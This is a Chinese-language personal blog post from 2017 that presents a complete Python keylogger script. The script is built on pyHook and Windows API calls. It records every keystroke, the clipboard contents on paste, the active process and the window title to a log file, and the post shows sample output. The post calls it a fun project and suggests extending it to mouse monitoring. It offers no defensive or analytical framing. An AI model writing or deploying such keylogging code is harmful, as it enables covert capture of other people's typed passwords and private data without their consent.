<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, Alex" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="最近发现了一个好玩的项目，就是利用python实现一个键盘记录器，代码也不多，60多行，主要是利用python库pyhook实现。python代码如下所示：12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656">
<meta property="og:type" content="article">
<meta property="og:title" content="用python实现键盘记录器">
<meta property="og:url" content="https://kakalex.github.io/2017/09/22/用python实现键盘记录器/index.html">
<meta property="og:site_name" content="Alex’s Notes">
<meta property="og:description" content="最近发现了一个好玩的项目，就是利用python实现一个键盘记录器，代码也不多，60多行，主要是利用python库pyhook实现。python代码如下所示：12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656">
<meta property="og:updated_time" content="2018-01-15T17:20:53.020Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="用python实现键盘记录器">
<meta name="twitter:description" content="最近发现了一个好玩的项目，就是利用python实现一个键盘记录器，代码也不多，60多行，主要是利用python库pyhook实现。python代码如下所示：12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://kakalex.github.io/2017/09/22/用python实现键盘记录器/"/>





  <title> 用python实现键盘记录器 | Alex’s Notes </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d62cb708729c57d32aad6f1e1b934caa";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Alex’s Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">照猫画虎</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://kakalex.github.io/2017/09/22/用python实现键盘记录器/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Alex">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Alex’s Notes">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                用python实现键盘记录器
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-22T00:19:22+08:00">
                2017-09-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2017/09/22/用python实现键盘记录器/" class="leancloud_visitors" data-flag-title="用python实现键盘记录器">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近发现了一个好玩的项目，就是利用python实现一个键盘记录器，代码也不多，60多行，主要是利用python库pyhook实现。<br>python代码如下所示：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> pyHook</div><div class="line"><span class="keyword">import</span> pythoncom</div><div class="line"><span class="keyword">from</span>   ctypes <span class="keyword">import</span> *</div><div class="line"><span class="keyword">import</span> time</div><div class="line"><span class="keyword">import</span> win32clipboard</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">onKeyboardEvent</span><span class="params">(event)</span>:</span></div><div class="line">    </div><div class="line">    user32 = windll.user32  </div><div class="line">    kernel32 = windll.kernel32  </div><div class="line">    psapi = windll.psapi  </div><div class="line">    hwnd = user32.GetForegroundWindow()</div><div class="line"></div><div class="line">    pid = c_ulong(<span class="number">0</span>)  </div><div class="line">    user32.GetWindowThreadProcessId(hwnd,byref(pid))  </div><div class="line"></div><div class="line">    <span class="comment"># 将进程ID存入变量中  </span></div><div class="line">    process_id = <span class="string">"%d"</span> % pid.value </div><div class="line"></div><div class="line">    executable = create_string_buffer(<span class="number">512</span>)  </div><div class="line">    h_process = kernel32.OpenProcess(<span class="number">0x400</span> | <span class="number">0x10</span>,<span class="keyword">False</span>,pid)  </div><div class="line"></div><div class="line">    psapi.GetModuleBaseNameA(h_process,<span class="keyword">None</span>,byref(executable),<span class="number">512</span>)  </div><div class="line"></div><div class="line">    <span class="comment"># 读取窗口标题  </span></div><div class="line">    windows_title = create_string_buffer(<span class="number">512</span>)  </div><div class="line">    length = user32.GetWindowTextA(hwnd,byref(windows_title),<span class="number">512</span>)   </div><div class="line"></div><div class="line">    <span class="comment"># 关闭handles  </span></div><div class="line">    kernel32.CloseHandle(hwnd)  </div><div class="line">    kernel32.CloseHandle(h_process)</div><div class="line">    time1 = time.strftime(<span class="string">"%Y-%m-%d %H:%M:%S"</span>, time.localtime())</div><div class="line">    </div><div class="line">    <span class="keyword">if</span> event.Ascii &gt; <span class="number">32</span> <span class="keyword">and</span> event.Ascii &lt;<span class="number">127</span>:  </div><div class="line">        Key = chr(event.Ascii)</div><div class="line">    <span class="keyword">else</span>:  </div><div class="line">        <span class="comment"># 如果发现Ctrl+v（粘贴）事件，就把粘贴板内容记录下来  </span></div><div class="line">        <span class="keyword">if</span> event.Key == <span class="string">"V"</span>:  </div><div class="line">            win32clipboard.OpenClipboard()  </div><div class="line">            pasted_value = win32clipboard.GetClipboardData()  </div><div class="line">            win32clipboard.CloseClipboard()  </div><div class="line">            Key = <span class="string">"[PASTE]- %s"</span> % pasted_value   </div><div class="line">        <span class="keyword">else</span>:  </div><div class="line">            Key = <span class="string">"[%s]"</span> % event.Key</div><div class="line"></div><div class="line">    temp = <span class="string">"%-10s%s\t%s\t%-10s\t%s\n"</span> %(Key, time1, process_id, executable.value.decode(<span class="string">'GBK'</span>), windows_title.value.decode(<span class="string">'GBK'</span>))</div><div class="line">    print(temp)</div><div class="line">    <span class="keyword">with</span> open(<span class="string">'log.txt'</span>, <span class="string">'at'</span>) <span class="keyword">as</span> fout:</div><div class="line">        </div><div class="line">        fout.write(temp)</div><div class="line"></div><div class="line">    <span class="comment">#按F12结束</span></div><div class="line">    <span class="keyword">if</span> event.Key == <span class="string">'F12'</span>:</div><div class="line">        print(<span class="string">'[Finish]'</span>,time1, <span class="string">'*'</span>*<span class="number">10</span>, <span class="string">'!!!'</span>)</div><div class="line">        win32api.PostQuitMessage()</div><div class="line">    <span class="keyword">return</span> <span class="keyword">True</span></div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</div><div class="line">    print(<span class="string">'All done!!!'</span>)</div><div class="line"></div><div class="line">    <span class="keyword">with</span> open(<span class="string">'log.txt'</span>, <span class="string">'xt'</span>) <span class="keyword">as</span> fout:      </div><div class="line">        fout.write(<span class="string">'[Start]'</span>)</div><div class="line">    hm = pyHook.HookManager()</div><div class="line">    hm.KeyDown = onKeyboardEvent</div><div class="line">    hm.HookKeyboard()</div><div class="line">    pythoncom.PumpMessages()</div></pre></td></tr></table></figure></p>
<p>由于pyhook中event.WindowsName中出现乱码，可能是版本的原因吧，本文采用内置库ctypes解决！！！<br>如果各位有兴趣也可以加入鼠标监控，方法和键盘监控一样。</p>
<p>下面为log.txt中的部分内容，大家也可以在优化以下。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:34	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:35	21068	chrome.exe	212_百度搜索 - Google Chrome</div><div class="line">[Lcontrol]2017-09-22 00:38:35	21068	chrome.exe	212_百度搜索 - Google Chrome</div></pre></td></tr></table></figure>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/06/python实现爬取妹子图/" rel="next" title="python实现爬取妹子图">
                <i class="fa fa-chevron-left"></i> python实现爬取妹子图
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/01/16/面试总结1-16/" rel="prev" title="'面试总结1.16'">
                '面试总结1.16' <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      

      <section class="site-overview sidebar-panel sidebar-panel-active">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="Alex" />
          <p class="site-author-name" itemprop="name">Alex</p>
           
              <p class="site-description motion-element" itemprop="description">小仓库</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
        
        <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=108242&auto=0&height=66"></iframe>

        


      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2017 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Alex</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  



  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  





  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("", "");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
